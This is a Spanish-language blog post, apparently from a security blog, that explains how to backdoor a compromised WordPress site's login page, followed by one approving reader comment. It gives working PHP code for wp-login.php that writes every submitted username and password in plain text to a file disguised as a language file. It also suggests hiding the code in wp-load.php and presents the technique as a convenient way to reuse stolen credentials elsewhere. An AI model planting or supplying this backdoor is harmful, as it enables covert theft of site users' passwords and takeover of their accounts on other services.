domingo, 5 de enero de 2014

WordPress Login Backdoor

¡Saludos!

   Ya sé que tenemos esto un tanto abandonado, pero en nuestra defensa he de decir que estamos realmente liados y sin tiempo, Aetsu con el proyecto fin de carrera ( cof cof auditoría a cierta uni, cof, cof) y yo ando trasteando con varios proyectos en los que estoy implicado, como WordPressa Security Plugin , entre otros. Asi que voy a ser yo quien haga el primer post del año, si no vuelvo a tener un corte de luz :P

    Cuando se ha conseguido ganar acceso a una plataforma web es muy interesante obtener los credenciales de los usuarios para por ejemplo probar si el par usuario/password coincide en otros servicios. La forma más habitual es dumpear la base de datos y tratar de crackear a partir de ella los hashes almacenados con el objetivo de obtener el password original, tarea que puede ser un tanto tediosa.  Pero... ¿Y si pudieramos capturar el usuario/password directamente en texto plano? ¿Cuando podemos verla en texto plano?


 
   Exacto, en el momento de mandar el formulario =)


  Este es un truco que se ha estado utilizando desde hace muchos años en los foros, siendo bastante común el tener ya una batería de scripts para cada CMS preparados para infectar los login. En el caso de WordPress el formulario de login se encuentra en el archivo wp-login.php.

A modo de PoC podemos usar Wordpressa Lab  , tan sólo deberemos de añadir un par de líneas de código a wp-login.php para que nos guarde los credenciales que son enviados:

if (isset($_POST['pwd'])){
$cosa = fopen ("wp-content/languages/Andaluz.txt", "a");
fwrite($cosa, $_POST['log'] . "  ". $_POST['pwd']."\n");
}

   Los usuarios con sus respectivas contraseñas van a ser guardados en el archivo Andaluz.txt en la carpeta "languages", pero cualquier opción es válida. Además, para ocultarlo un poco, se puede incrustar ese sencillo código en wp-load.php, ya que al inicio de wp-login se le hace un request().

  Truco fácil, sencillo, y que te ahorrará más de un quebradero de cabeza ;)


5 0verl0ad Labs: WordPress Login Backdoor ¡Saludos!    Ya sé que tenemos esto un tanto abandonado, pero en nuestra defensa he de decir que estamos realmente liados y sin tiempo, Ae...

1 comentario:

Daniel Maldonado dijo...

es una excelente estrategia para no romperse la cabeza.

Saludos

< >